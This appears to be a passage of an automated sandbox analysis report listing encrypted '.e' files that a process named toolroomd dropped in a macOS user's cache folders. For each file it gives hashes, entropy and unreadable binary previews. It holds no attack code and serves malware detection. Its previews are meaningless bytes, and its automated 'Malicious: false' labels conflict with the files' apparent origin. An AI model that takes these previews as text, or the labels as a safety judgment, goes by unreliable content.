G..Wi...SN2..O.-...b..b..?`.v..[.s"..x.4..?[7.(...._..^...-..`..+..R......a.p....h......E<\|.M.....S.aI.rF.b.q7...37a^.<,.....TR.@.....\.../OM...gx.".....~.O..q.A.jX.....b......1.......X^S....U.>.]h..._..Z.j.$..

/Users/berri/Library/Caches/GeoServices/Resources/.sand-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	97799
Entropy (8bit):	7.997394927168586
Encrypted:	true
SSDEEP:	1536:LaAWWqC8rCeuZxsYYZpS9/KZ/UYQ+3dlCxK/5/U6lU3VZpGTpK6S8JaAU2ELq6HX:LXWluEdfS9CZ/Uu3dQmjY4T7J1uLq6HX
MD5:	297176E0C9A33DD345A42C891FA7A5FD
SHA1:	61E6EE9EC80D40783DD07F5E203C88928323CCCF
SHA-256:	6EAF911DC6CE6AB4656CFE7BDC4F54516935C557FD6A9216EF2F7CB047896608
SHA-512:	3CA8CBD8D47A7F0F0D1825862062D40B88E9D3ABCA115C2318998F94E8C04151ADC7B666E78D2AA0B5A70718B7AE9297B141AE9544C021D12B9EA5E0D57C72F7
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3........J.2....1u.......~v..8..0.CR] "d+}.].X.y@As..u.h.x.p.+...Z.{...ZO..=....m....~.:.u........s.`C\|....-(.'q.$.#......aC..k4.jT}[..8.^...Rn7 ..O.:}#.:.%..`,Y...Z2.....Vzs..D.t.C...;..1J.H."8.&P..X.TM......'..D.............M.G&M......eU..p4x....!Z."qs.....^............V.....5.nLO.;..O..mx.cTP.f.).h.....R{3.&#L..4..; .......\|...qY..#....S.%M......?@b.4.P...}....k...).......OE.j....O...{.d...Y.).]f.\|..~Ky...7...r~..x.6..nz..q...\|....>`_.&.....@.\|..H.....Q....u...N.V..F....z.J9%....\|....{i.H./....@5..kH.!W.kY}XB.D.7h=;y..`8.[~g..}...Gg.\|.@I.0...q../......Dq...2...xC.o..FJ2.....].F...;^!.i).@%".I....U5...5(Ws.....b....-L..c........1..G...kE%.E..%...f....?%i...<[...m@._tW,@N.P.4.....cj...hOU9.K.M..../p_y....vY.h....y{...S.K..&{..../NU.o/!.9>e$.o"..R....`me...n......f3....d...xn."...."..W..oO...g,.~.....2.S..D...7E...". A..lJ.Zd.zD...c....Fq...a..(.w./nk8.V5..

/Users/berri/Library/Caches/GeoServices/Resources/.tomtom-mask-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.604065981996688
Encrypted:	false
SSDEEP:	24:on5xwgs8WSugqyxCSCHqqPDidzI6jFSEcNImiTEi7DpspsKep9ZRvPOsePc0m7:o5SM8HLMMOFSHamuE4SaKsbRvPONpq
MD5:	0196D49DED97450648396BBBBFD60E09
SHA1:	9049AD5314A1911E4BFAEA7F153966A11F45C48E
SHA-256:	7966111720BFDAA2DE489749DF432924B652070DDC0366BAF11E0A62F1A7F347
SHA-512:	62D5BCB81AFAE2B254A5821E8998099997492E593AA1FEFB32A387D64864A009CA1D75F4BE51979841EEA960D83F05079711B30FC9471A129D3149A0A6FB0857
Malicious:	false
Preview:	.<.\|.....f.A..........#.-..vJ.....q.i .Y.a...b.J.z....W.<r0.\.........c-.!V.v\|..._..1....%....9..]f.T.8[..y.."5.#.&..2.6R..p...#Z.H....8..O.!.\._..+.G2.J.........g(w6s..wn.a.....y..L..aq.xch._.k>b.B.f...j@a....<%.9Z}r.....-yp...L.v..F2&M..Ji.....G6.v..r.tR..[.....4....]..h?9...}.~oo..g4.~.[..5e"I.;..H.b?."..%T...9..d.....]>.I..5F4+..\|V....$..@q9._..:...E.......d../....Y.o..%..~.t./f.a8-.<2yc...m-SSZ...K....B..^....F.I..q.db.z.x......3.EF...G>:....P0.97bc.F..../.!.0.....cT......[R_x...1......&..\|.o^....=.S.....5...2H.-Cy....@..'r...u...'....a...XH=.......8.O+.r..)~~.;._C..\|EJ}...5..o.^.^;......O1...q{...,J[..FF..m.q.....:T..../.m..#.Qb_-.P.U@....Ue`/...`xG8....F.US.7..&...^u....)X.....%...vK.S."........^..Y...@D.W.~...q,.a........0N..* ..RL....%.z...Z.....7..P.n..S.....Z..N.n.QHB.....N.&....Y..v....?.8.$W..65.mU..S...D6.b..%...>..$EWcW5c..[M.)..........#Z`..G......x.a] uh..49...^9...O.K:..s....t..F...7;...^....&q6.q...U.....?(m.*.Y....

/Users/berri/Library/Caches/GeoServices/Resources/.tomtom-mask-3@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3466
Entropy (8bit):	7.830307225950429
Encrypted:	false
SSDEEP:	96:a8oC+yQL1BTuNbqQ3R5FXIiJIbIbXcCCARtXO/GYlHSEQnau:XovJ9XoFXIHb+XHfXO/PNQH
MD5:	D709101A21C23BC199FB3D8BB07B632A
SHA1:	2E855F7CF3E873A279D2704B182ED5257562CE98
SHA-256:	523B5220F5FCDA658A3C39084856B305951597B3B9988E436E2A395C5F124662
SHA-512:	85042512EA1AEEA23DCF68A473EC236BB2CE3B4E64365CE3BE3273473424138E076FD9472496CA8B10BF33947C785E7A3D10A4A159AA284C28B854F6B527E966
Malicious:	false
Preview:	.<.\|.....f.A..JL.5.....wg>.T0......-.i .Y.a...&\|d.....y.0k..!"&S..zt...DwA...xs..Dw\|d8".....%t.\|....2.}.iQ.&f1w..d...).{5"g.).6....+JW..w.}Zl'Pr)U8.......6..i....h....}7...sK.4.. s..~..j.B.......R.......r_..<..5.....ePE.. ..BP. &.X.._..N...6...'.)K....h..4dm..\.7....G.5]E?.7......q;.>.R..N/b.0.`....{.yaoN.'.9.>.....x..B...w.KN.A....'.2....Y..;e..Xx..,....&i.}5......,K_-eP.H...N....'.Z.[a......8J..^2H....f>.B...d.X....d..I..p..i..>...N0.......m.[.>J2BQ2.6.0v...[...xA...=..'.A.E........Eh....m]...Y..t'O.y.u.....4..f.v........%.t.]..yS~..=...[...)....bbY.XZ....3...O.y.(..k.L..$ff...w..e.P.K./..f..C...v#.l..1N..lynQ....c.XCQ...@....c)./A.xD...h.r.N.`7......yG..t.m%@.N....@..9....q...3Ie.R..7.p....\|.}.......'....GZ.x...U~h3G.o...,e.9}.uJ...!BDZ.s....~W....i..,.U..NG.........;.....W..J...k...+-..v>..UT<t}....r...l0u}.[E..M.M^../U....n=............;...[.9m.;...+7....t...5h..>V.\kL.v.......).p;.....sJ.M4.....u..4p3......t..H....#,........

/Users/berri/Library/Caches/GeoServices/Resources/.transparent-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.496541460057169
Encrypted:	false
SSDEEP:	6:WEH5Jis3cJidc9J4kZ+ELDH0McEBzsewLYHEec/LaqG8rQQwiQ/6:WC5JV3QiO0dQsewLYTc+qGm7
MD5:	A3A4318289F044E9F885D20659FFE0AE
SHA1:	67DB3574EE4B1FAA4815A8F47CB1ADFC3AFB3375
SHA-256:	801E55C7F09E5671A37B680AB0F4E23634FC4B540387CB6380C080A40AF639AE
SHA-512:	C547B893CD368155DAF047CFA338C69BD3E2C5BB1B25DE702020415A5444556561A5A59C901997D14CDAD9F6FCAA4BC2306042D61150CE7E9EC116031C5DAE39
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<..g:.}.........ca2.......2L. ...W.8>.X.z2.z........7.J...B.\|^A..b.x.n..0.$j=%.........u.y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.transparent-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	426
Entropy (8bit):	5.496541460057169
Encrypted:	false
SSDEEP:	6:WEH5Jis3cJidc9J4kZ+ELDH0McEBzsewLYHEec/LaqG8rQQwiQ/6:WC5JV3QiO0dQsewLYTc+qGm7
MD5:	A3A4318289F044E9F885D20659FFE0AE
SHA1:	67DB3574EE4B1FAA4815A8F47CB1ADFC3AFB3375
SHA-256:	801E55C7F09E5671A37B680AB0F4E23634FC4B540387CB6380C080A40AF639AE
SHA-512:	C547B893CD368155DAF047CFA338C69BD3E2C5BB1B25DE702020415A5444556561A5A59C901997D14CDAD9F6FCAA4BC2306042D61150CE7E9EC116031C5DAE39
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<..g:.}.........ca2.......2L. ...W.8>.X.z2.z........7.J...B.\|^A..b.x.n..0.$j=%.........u.y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.venues-ceiling-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	45004
Entropy (8bit):	7.9945430687685795
Encrypted:	true
SSDEEP:	768:Q1UGO8e4WrVP3vljrQ9virWX6J9t1hdszxH5Rwol80CfITJPpdJNf70hBTnp8Af8:KUGu46VP369oZhds1gOCf0VpjR0hVpJ8
MD5:	C3CEC7939111199DA55CE71AFD8DA6B9
SHA1:	EE27E2C4F0F8C4566F88DD4EF7D29B3DD38A6611
SHA-256:	C0333E24BC922201ACE6DF08C1D613A08D6F36B2A1612C6966929DC548A450B9
SHA-512:	7353166ACBB3E8DDDC2146700ED651860FC6B42F0B74C17985B2D0A608B814790FBD3B7321F94B7107CCDBE139E4A6EB4368FEFEF3FC6A33CDF3E2CB14ADDDEC
Malicious:	false
Preview:	.<.\|.....f.A..vM..j..<k....7....T[.{R..i .Y.ac......e..b\|.>(vd;...B....M.y-ka.Z.\|.uZ.......e....h..........1...,.....DE...`..KT.F.t...N.)......9N.D...=.d..fl.CE.u-.C..3.!h.....X...O.^...S.{.......B.`\|@=....#.O.E.?....N.&......Y'.b?....'q&?..q..b...o.?.7..(..cw......Qf.]...1]..it..".XG..........o.y.V.......&Y4g..3.V..r.M\..p.:-Z........B5$..C...Q...I...X......M9....=.I..k.U.J.G.7..Sb.Y.<.kR..N.>f;...W..l...K.g.fQ.#..G.P.WV..Kx.n..e=.d.,4..\|......+u.ic...K.n.d^......G..2C...tS......S...c+.......\w$..K...6.z...M..y..Ri.....8....9..xK.<_.pZ.$...).....w.....@nP4I.u."...h..4#.)Fa.p.(5.......[%.............&..o....QR.....V....ND..E6.#Z......x.3.!....lQ..:.<s^`.Y..#1..do....F...Sd..2~<../.{)e..\].M.........8...%.-..Q..a.....p0.U.O...S&..2...V.T...*...Rk.}(...)...S..$....J?..f1....@..~q...2.c[6_\|s.x[.#.!.1).0..l_....#..L.S... .-%.%.!..m...a]U.m6~..C..r$..o,}...7...)..'..."..6..s..............X.A>x..X..\|......Bo.l..9..H.:...9.6>...3...

/Users/berri/Library/Caches/GeoServices/Resources/.venues-ceiling-2.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	11770
Entropy (8bit):	7.967416700254339
Encrypted:	false
SSDEEP:	192:l3upJ0N9L31CLz7U3Z5BsDhjdZkKbjXti3JX0PbdW5jWbAE6+OEdQ3mAgmGo:0701UXU3FmdZLWJX0PxW5jWcM2ImJ
MD5:	9254AC21260BD671F42F1BAD7B8417A8
SHA1:	59729B1E134FFE8FF0A01FF2BAB02437EAFE8117
SHA-256:	346AAF770BA9E1AF51B19B7D1B204376C57EB4164F07AFD78E123F0534F4BD20
SHA-512:	FE7B8B345C259EDFA03951F6306CBF110E45D210C3FD14164BECEB4C0DE2463C2B954822EAC7D3C38F5787C9E6D4D2F3E52C90383B219CF301D7739D7BAE6A6C
Malicious:	false
Preview:	.<.\|.....f.A..>..D......f.....p..QG...i .Y.aZ@jpN[.....]!A....Y"3.....Dn.......8...... ...\.".mu...Ibk...0E..Z........?.2..k.Ya..!...Kq.,49.c...'I$....1w..<..0bgP..\|.\|.....\|.k.+@S.J~@...e.7\l..Z.7....\...w.j4....~3....CNMA....../..w..c..D\|\>..u.Pw6f.....K.43.V..1.#m...xm.`&}#)..3..PY&.>>.6z..a..).."?.F..D....u..Oq.]"%.>.W...s...[.3....T.._..b....$k.Kct...1xv..a.-Fn.<.431.H.NP..:^v.>..U..\.}ni,.[...l....l?.M....`..,v.p...NvSb.DD.Ju...)x.......3.<-?.5.....I.F?....s....5..... .,.t.....[d...]$3.Z.,.1.g.B5C.?.\T`Q]/W.....D...+z..}p...R...V.cbQ.t.%...2......X.k.3E...@"....7....2...V...o...5.G.bn......Jo'..<xa.A..e?v..C....{..<.J.......@......:..#..\|....#..D....\|.B>...O..iAO/.(......S..@.n...>I...D..~....G.x?X..}..."F6c.D.\ZR."......:a......<.H.LF...h.....n....M..L..pD..a....f..U}..H}.9..X.l...p1d.<.j.J..n...h2.2Gl..\.*p.....W.mG?..........2=....q..h.2.bfJ.")..gE...p......ZJ,p...gF?a.Q+..,.....W .(..T:./..!.t.`..p..%"ER4........=..>3..'M>b...P

/Users/berri/Library/Caches/GeoServices/Resources/.water-16.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	11226
Entropy (8bit):	7.964676614856459
Encrypted:	false
SSDEEP:	192:zirLzzaVgoprpkZnnxRZg9Tln9nnEPU0sXf1DoSuHlUIMxTHGcFrdD3oey9:ziHzzaVTRp0nXZgTJnOUVXfCHlULTT/i
MD5:	C077A777CE0C35BF53B9EED81595C5A1
SHA1:	BF5A848EF8B7830AB3DA2B43C2A239608B187866
SHA-256:	CF18D64CCD2C0BE13B4AC3F967D992F40947286D642EDC1B371860FF332FC334
SHA-512:	2DEB1051CC7DCAF18EAEBDE4E895A7129105E30438F66807B4D2FE1227429B367C23EA1793767DDFFEB4D461AF4D6019BD7F3F0018A6091CBFF6F17AEA5CFDDC
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..>..D......f......R..{8.Z.....A....'\..~.h..f.._O..Wh\|.n{.!;7+.a.^..@}.h.....1..v6X..?..L.{(.^.F.......t.'f.SX.;.{e...%.!N..0..Vh.e..>.)>@".^Ve......-B.......7W8.-...,Ye....H....E.BlD}..i,...1......X......x...'.X.9.fJ....u...M..#)..V.2.v .-].)....A....=..z..G....Jnr..7.NQ&..\|.......gM.p:....@q...,..:<Ox.......J.AX...;..!.Jw.p.`g.n.;L.f.>..&.. .t.I.\|._.Ru.s.j......:.$IS.A..9f...d2XS4....d.h..=6by.~....]V.V..]....9.(.5...Q...h.?.<?.`....^........mDq..K:Z....;."9...\|.<W...rx'.8.=...........m.Yo.....]..4...:..oE.@..A...B+.].".t.W....Q......-..S..... .Qa...1.....%d...o...@.!x..QPv.'SR..D}y..l.\.k$.K.. z{.....N@........#.....`)...R.%aY..R.B.y. .'.^.kg0....f.._...6U.M...!.1......RT'..]8.[E1MqQ.\.~..CE.MVTO7.JG>.XC..:5...c7._......>Z"..U...E.....K...,...`..`...n4I.P.c.......N].\|......,.%..x..........AK.>...........1...p..@jf!P<_..%.]..+....rbyw...W.0.QS..E.BT..t.M.]..-.cW....f..\|...d.&.Z.............../.

/Users/berri/Library/Caches/GeoServices/Resources/.water-16@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	21459
Entropy (8bit):	7.984754543164929
Encrypted:	false
SSDEEP:	384:hYeliQAZapMyHyKLJAXV9RHIrQnCBOuIk/ikYNEMJ8lDLdHr38wTRBQ:hfMQWWmAJAXXRHIrzIk/izNEMJmL5ZvQ
MD5:	541E732BA7605C2DBB3E0A4395B40516
SHA1:	B6F9011EF2416C26FC36C6175D09866BCCF69221
SHA-256:	6CC633DAECEA74B8CF54B92B09E0DEC174BB2016A87D7A4EE39F4914B2F3CFE1
SHA-512:	2F25892AEF7B697074B24EFD33D859C475BD431C690E4F6746C6A5F23022C182CDBD217C9A0099406D370A81F7A0C5D8F711688E01FB96AB6A2ED2E16740267D
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A..vM..j..<k....7....e)i...Z.....A.Q..9..W...3...q <W]..c..>.M..R3....8.uO.....21L...-.aU.....N......f.>..4.....T8.0eql#ps.e..Y...^\..?'.8.]..xdBGN.x>..%Pc.H.....P....X..^(.. .T........F......X.-W.q...m.0.\.j..?..J>.4C.@.......T.[...0.u.8$N8.`.&0sKI...F....7F.u;.G6' ../.#."@HO...3.dS.^!...,.&........\.(...f.0!(e.G......._..J.z.......(..$@.]w..Wt..8..CO...~`.s....;..q.M..93........,6...C..W...#2z.\|..l....^v..u...r.U.....n mhJ..<..H..Z..=.9^.....fG.1.C.C.z.8kasZ".m....].,t..A%)...V.P.y:..R]...Z!R......f.}...Q<S..h'4r$a..........y4..ZAVG ......0n..RV\X.Dy...S.34..)v..z...>`..m......L..n.....].!....j......'[..p.O.e...6.Eu.<_.x.".x...F..k..[.l0...d.#....Y.I....... ....>....l~..e.3.z...$.Uf.>.M.u.....j...(-.;&...1.=Z}..y.=1.!..7..Q./.?8.6.OeM.q..9.fz..V.x........x...$.].bhA.e..C.X....G.ho.......a...T.jF...V.._.....t.<.k.%7ul.`Nv.-=.".._.....ZO.6.g...?..Sy3Fp+....>..o.dl._9=........Z... eM..Y.9.0.Q.N......>]...Z.

/Users/berri/Library/Caches/GeoServices/Resources/.white-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	394
Entropy (8bit):	5.2618722224761285
Encrypted:	false
SSDEEP:	6:WoM+KLYrxwRlY//aBzsewLYHEec/LaqG8rQQwiQ/6:WP+K0rqRW/GsewLYTc+qGm7
MD5:	B59A94CCC4A3AEAC82F7AD196F3CC653
SHA1:	AA899E303D570B65B068EE5F080D404E237F3C71
SHA-256:	A9383F9415009A8E8D64A1B6BD4424F1E9C6B2B3BC9DD86743AE7AF672300767
SHA-512:	58091C0A984F578ED752874D50BDF39FB3D03CB0AE9616CAC91EF99CCDBDB8F5A1CB1FF244BA1FCB36B702861B78584C98763AE209DE88550D0FE740B03401AB
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A....i%0...3n.....C.Ws....}..#.`..g...".......bio.t...z.Y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/GeoServices/Resources/.white-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	394
Entropy (8bit):	5.2618722224761285
Encrypted:	false
SSDEEP:	6:WoM+KLYrxwRlY//aBzsewLYHEec/LaqG8rQQwiQ/6:WP+K0rqRW/GsewLYTc+qGm7
MD5:	B59A94CCC4A3AEAC82F7AD196F3CC653
SHA1:	AA899E303D570B65B068EE5F080D404E237F3C71
SHA-256:	A9383F9415009A8E8D64A1B6BD4424F1E9C6B2B3BC9DD86743AE7AF672300767
SHA-512:	58091C0A984F578ED752874D50BDF39FB3D03CB0AE9616CAC91EF99CCDBDB8F5A1CB1FF244BA1FCB36B702861B78584C98763AE209DE88550D0FE740B03401AB
Malicious:	false
Preview:	.<.\|......De.....OV..z.f.A....i%0...3n.....C.Ws....}..#.`..g...".......bio.t...z.Y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/Microsoft/uls/com.microsoft.autoupdate.fba/.ci.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	370
Entropy (8bit):	5.062408162996114
Encrypted:	false
SSDEEP:	6:UquYOD5FNlpaBzsewLYHEec/LaqG8rQQwiQ/6:UgODplksewLYTc+qGm7
MD5:	680F0F3B4C700BD6B1343E2DCE409440
SHA1:	7C84F2D19484A1DFF4DB881CDB91440C80B39F20
SHA-256:	7A9B5FD7E3865B12ED27048C121B520BE6F3E76273679DAC65E4F1824CD30708
SHA-512:	31BDFA602EEDB79D0BEAFB230FA5835ED0564B272BF0C38D09D3CA6B45E80E1AFD24CAD907DDBE7B5F7D16A8CC1249DBFF7C6BECDE001316230CA1812439EADF
Malicious:	false
Preview:	...a>k..\.q.oL..M`..k......Y.O.u....rW..t....Sq6<.."a..\|.E$.>.e.A.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/Microsoft/uls/com.microsoft.autoupdate.fba/logs/.apple-device-log-20201126-1422.log.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	PPMN archive data
Category:	dropped
Size (bytes):	1666
Entropy (8bit):	7.514505035472544
Encrypted:	false
SSDEEP:	24:sqNcPSM2C5aD2YbW/459o7vebROQHepaFsZv2fR3MBy3QL3K2IDk6RwHmFQsePcx:sPPP5iPEEqrCROtZvwyrIDBRINpq
MD5:	658FDED12C4E9341F5BEE3391EB33E80
SHA1:	6934497210032144138E7640E5A292AE049D2545
SHA-256:	05806472AC698D8FD6DD53684E90AAA4FB0B593007C3C6CDB707CC62D83CBF86
SHA-512:	64BD262859F6BE89949FA83482DC9039A9226EB50A8922A5C38BCA1C001F7F952EE704EF9C39D9784A95BB68AA23F92B142F6EDF8189079BAEABCEFCF2F104B8
Malicious:	false
Preview:	pNN.0F+...=.....J.b.....;8..\.K..d..y..7.d..(......_y.s......~zL..X.5...q. ..E%..'.g\{. ..L.Z....s...c.........mw....Z.....N.{D...".....A.0.....cs......cs.3..Q.O...9{..\+.....d..7ZxR8......'._.ol...s.y.a..L..{t.....0~.+.3...#.<.S......j..E....M................y.m._......<..gD...K.,~....M6.<s......0.?.y.....7.M...@LL4V.;..1V..uO.I5......).)sdb...p4.l..2.b".....%A..K..p........ /.7..u...\....O.-.>w.&c....Z..o...v..0......\6..{XD9+...2r%....]...^P.O..El-?..}L.mZo....m...ii.....bk .....E}$..^.4]L.13.J..(.j$..Wj.(........ ...YF..L9.i?.s...Wj.(......=kQ.v.....hz.../. ..m...e.j.....IFS>.7>.j.~.mk)c.AX....&.DJ.......k 7kD..e..S.&....._.../....+.&.li...pMg.^]-....e...\._Q.\|.S.hY....I..-.X.#...z;. ..o...X=(.......%..AX....&.!....3v...k........I.........I;%.r3..U$2&!dP.h..op_Q9.X........g..Wv}.4).%v......0.;..D..Z..Qnoy...<_._.......<...#.............+"Sa.J...t..R...9{..\+.....d..7ZxR8...`...?.x.v..8K.....cs......cs......cs....s...c.........mw....

/Users/berri/Library/Caches/OneDrive/.UpdateRingSettings.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33348
Entropy (8bit):	7.8138240122713984
Encrypted:	false
SSDEEP:	384:ppMBSX4RaNhFci2TiUFoiC9Q9XbzSJUuubv3fd5WlaVHPk0kuEmW8IeYrWG6om3y:j+7Wmkg3E//albUWxns++8P40VgV
MD5:	6BED7B4D400EBDA3952339B18D67B155
SHA1:	E6F817C265392CE52E259B6C4B57623C1693EF71
SHA-256:	9F30A3EFC19A88220513FDAFDE0A0EDC9B798538F178737034653CFD25BE7FD5
SHA-512:	D3B0E7D011F26166E64882D8C9169FD34A292CC02206EFC2AA49A9232A9DFE1F174C9344A65526283550E87CBC187DDEB51B7B2691F243D6AF12BF5C6456AA37
Malicious:	false
Preview:	c....tO(V%.R.3......?....f....{.d..!..0.&2....U..$^o....f....{.d..!..0.!.....J...R.<..f....{.d..!..0.&2....U.f.....t..f....{.d..!..0.&2....U.S8dr.....f....{./-.....N(v..y.q$....~1bx.....p......S[.M...}.9f..N...2.pI.h..r..a...<...ZI#.}.....L4.+....B.....G.y.i(4...w...`TEM.&2....UC.[F. ..Wz.e..GK....ok..;.Z....w..&.df.C.i(4...w...`TEM'}.M.D?.4........ZI#.}.....L4.+....B..]V.O..9..i(4...w...`TEM.&2....Ut.u)q..yWz.e..GK....ok..;.Z....wFs.!;....i(4...w...`TEM'}.M.D?.h.[./....ZI#.}.....L4......!......}.9f..N...2..Ab.Y-01 .`.s..#.3.C..z..f....I..[]B]_........q$....~1bx.........%....(...w...pa>...^k..l..d..!..0.&2....U......`.Wz.e..GK.....J....C1.4.......?....f....{D.\|....!....`o.....pa>...PK....;.\|.......C1.4..J...R.<..f....{.d..!..0.&2....U7...l{[.Wz.e..GK....ok..;.Z....w....#9.g.i(4...w.*..`TEMQ..j.PhIU..r..,...ZI#.}.....L4......!...G.=..x..}.9f..N...2..Ab.Y-01%.Z8,....3.C..z..f....I..[]B]_d.Z.s.q$....~1bx.........%.B.^si=.....pa>...PK....

/Users/berri/Library/Caches/com.apple.cache_delete/.CacheDeleteAnalytics.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	6.9776906580370825
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9Maiu+UNg2dzeh1e4l5YsePc0m7:yjzqaiupmOzere4kNpq
MD5:	7023B83B1EE41C473347C1AE1C007331
SHA1:	9022A2A1313BB88AABE5E041165E52A5F0270277
SHA-256:	5313C37187BC86345F73F9F3EC392E52AB2B0548A66D12BA0FA19832E6B981DE
SHA-512:	A94A5B64DC97539BC73CD108CEEBBA5ECF2E8E022088511BCE89F6FFC4F92720F4A4911685032C7130DFB945E8CB9C67D56DAF61616F80F445DC654CE9545FAC
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C.~.r..~9..e.m..X..qp.......=B....sK.@...\|.].05.H......E.B.A(.A.7U.2...f7.....d..........Y.lCL...-.mb...,....0I`-..,.....>.Y...Vae.H.8.C...pC..&....t.z.4...I.ud.z....5.Pe....">!1....7j....'a1.....9j..To..f..v..v[..I.+...R.hU......R.$]..(.oL(.Y.......IQ.D..c....O\..............o...Q.J\...E.B.A(.W....=...........@.Dz]Uz.pz=...FO._.....I.x..j..$.w3...).O..[.).................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Caches/com.apple.cache_delete/.CacheDeleteRecentInfo_v2.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3914
Entropy (8bit):	7.640818134650276
Encrypted:	false
SSDEEP:	48:D/7Vr8U/Z1aHjixEp5Sbin42u7CoDLRLtqyvMI2eFSx33MJLwK477zFIWK8WNpq:j7l8iaH2xJyA5NZfhFSpaLwV77zTK8Wu
MD5:	AA048021F2FC2947E011142EDA5E547C
SHA1:	58B09287E033577F6E1F3A75F6F6D2C0BA80A4E2
SHA-256:	B569D4623970BCF957C54B00AD7FADC5E2308BB9FDC3E98455A7ECC6E5D7E3DC
SHA-512:	B175FF092C3CF557ED3D76C175384B86ACC00D91D56FE3A79B6A1C23B50EFD4BF40CAB74C10F868DDD4910E49C5F6D54F972CED768595A7A2F6DD099A20F6A1B
Malicious:	false
Preview:	...a>k..]A....>..i...K}wzN\|...F...=.... ht..8....c~.o5.....[......W1....b._.=.n\./hU.$....B\|..C...Z&...xh.L..tH....z.. .......#.RJ.[..R.........{..r..=z..F.lus..B....v.H....u.;l.~....C..~......A^..i..(...x?....'uR.R../$.Qy....?R...q..p.(>.+2.)......o.. .m...."...o.;.YA.BH.d....ds.&..9......2)N...RB.T...nW1t.[..t..}....f.j.a.-...G/K....z......O.7.rK.z..../....\u..K.xk.p........B.S.W.X...8.......U7K.w......-..N.Ji.ZI.N.2X...../F7&..qL..+].&w..0t.6.$hn..V.....;jWn..2.K..D.../.}....dn.i.6.?^.D.........A.Dc#..J..F"..vH8...\...m.."..}...A`.....4._.U=.;..@.0g....sY.\.:.9;..G..1:...Ic..#Fy6.....,.}2yd.=A.0._....=..a.........../%..~e....&..l....yj...8.....F.1xi.v......K.e..Q.fs./.X.9.....\|Va..H.J. .n.Z...[.iI...140y%S...:.......w.+.@...bf...7.^.I..Q..v.C...r.$..[.I........!.w..d...G[...v.C....J.G......1...'.L....\|Va..H.J.L.x.kx...y..e.9...........e...4..#.m%..U.}...m.uw..#..v.x..G.i.7DU;(..d.......O2:.v$.p).?.q...}.....W..[G...3.`!.k..E...u....i'`

/Users/berri/Library/Caches/com.apple.helpd/.Cache.db-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.8878797729171533
Encrypted:	false
SSDEEP:	48:jlAOqzlDI8td1lHLWUYRwCSvRHZSm8IkD8jHqDpvhANpq:polDI8zHyUYRwnnS/DoKzAu
MD5:	B3F65DB6E04B8788744128099E151B8A
SHA1:	DCEF377B55CB5D23190974FD19B26D26B13B4526
SHA-256:	1EBE97143CC8A6AA0E7A2BF8F89FF5096E2973F6D23555DA6C9260EAD7AAA7E2
